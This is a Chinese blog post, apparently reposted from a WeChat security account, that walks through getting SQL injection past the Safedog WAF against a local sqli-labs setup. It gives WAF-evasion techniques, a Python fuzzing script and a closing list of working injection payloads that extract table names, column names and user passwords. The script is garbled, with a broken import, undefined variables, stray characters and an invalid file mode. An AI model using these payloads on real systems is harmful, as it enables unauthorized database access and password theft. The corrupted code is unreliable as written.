实战|绕WAF实现SQL 注入

渗透技巧 3年前 (2021) admin
996 0 0

使用自己编写的Python脚本,实现绕过某WAF限制,实现SQL注入。


先解释一下Fuzz概念,Fuzz是安全测试的一种方法,面对waf无所适从的时候,可以使用Fuzz模糊测试来绕过waf,甚至你可以发现一些意想不到的payload语句。


SQL注入绕waf常用的方法


使用大小写绕过 例如:

使用注释符/**/ #绕过

使用/!**/绕过

根据数据库特性进行绕过,例如mysql数据,使用/*!5000 union select x,x,x/

更改user-agent

…….


使用/**/结合Fuzz绕过


先组建好sql注入本地测试平台,在服务器中安装某WAF狗。本文使用的中间件为apache和数据库是mysql,首先安装配置安全狗,在此之前需要安装好phpstudy。

实战|绕WAF实现SQL 注入

访问搭建好的SQL注入平台.

实战|绕WAF实现SQL 注入


先进行测试过程为:?id=1’ union select 1,2,3–+ 拦截  。

?id=1’ /*union */select 1,2,3–+ 拦截  。

?id=1′ /*union */ 1,2,3–+ 不拦截

?id=1′ union 1,2,3–+不拦截

?id=1′ select 1,2,3–+不拦截

说明union和select在一起会拦截

使用/*%0a*/union/*%0a*/select/*%0a*/1,2,3–+   拦截   PS:%0a是换行意思

实战|绕WAF实现SQL 注入

那么这个时候可以使用python脚本进行fuzz测试了。测试替换脚本为%0a,%23代码如下:

From urllib import requests

import time

url='http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1'

union='union'

select='select'

num='1,2,3'

l={'%0a','%23'}

ll={'S'}

lll={'%0a','%23'}

x='/*!'

f='*/'

def bypass():

for xiaofei in a:6t

for xiaofeii in ll:

for xiaofeiii inlll:

for two in range(?,?):   #?自己指定步长

urls=url+xiaofei+xiaofeii+xiaofeiii+ll+str(two)+union+lll+xiaofei+xiaodis+xiaofeii+select+xiaofei+xiaofeii+xiaofeiii+num

try:

result=requests.get(urls).text

len_r=len(result) #len() 方法返回对象(字符、列表、元组等)长度或项目个数。

if (result.find('safedog') == -1):
#print('bypass url addreess:' + urls + '|' + str(len_r))
print('bypass url addreess:'+urls+'|'+str(len_r))
if len_r==715:
fp = open('url.txt', 'l+')

fp.write(urls + 'n')

fp.close()

except Exception as err:

print('connecting error')

time.sleep(0.1)

if __name__ == '__main__':

print('fuzz strat!')

bypass()

测试结果

测试结果为:http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1/*S%0a*/union/*x%0a*/select/*x%0a*/ 1,2,3没有被拦截。

实战|绕WAF实现SQL 注入

扩展

同样利用其他方法进行爆破,下面是payload。

?id=1’ /!20000order/by 3–+
?id=-1’ union /!00000all select/ 1,2,3–+
?id=-1’ union /!00000all select/ 1,database/**/(),3–+
?id=-1’ union /!00000all/ /!00000select 1,2,table_name from/ information_schema.tables where table_schema=‘security’ limit 3,1 --+
?id=-1’ union /!00000all/ /!00000select 1,2,column_name from/ information_schema.columns where table_name=‘users’ limit 2,1 --+
?id=-1’ union /!00000all/ /!00000select 1,2,password from/ users limit 1,1 --+


作者:liangxiaofei 原文地址:http://33h.co/9t245


声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权否则需自行承担,本公众号及原作者不承担相应的后果.


看到这里了,点个“赞”、“再看”吧

原文始发于微信公众号(菜鸟学安全):实战|绕WAF实现SQL 注入

版权声明:admin 发表于 2021年11月20日 上午5:00。
转载请注明:实战|绕WAF实现SQL 注入 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...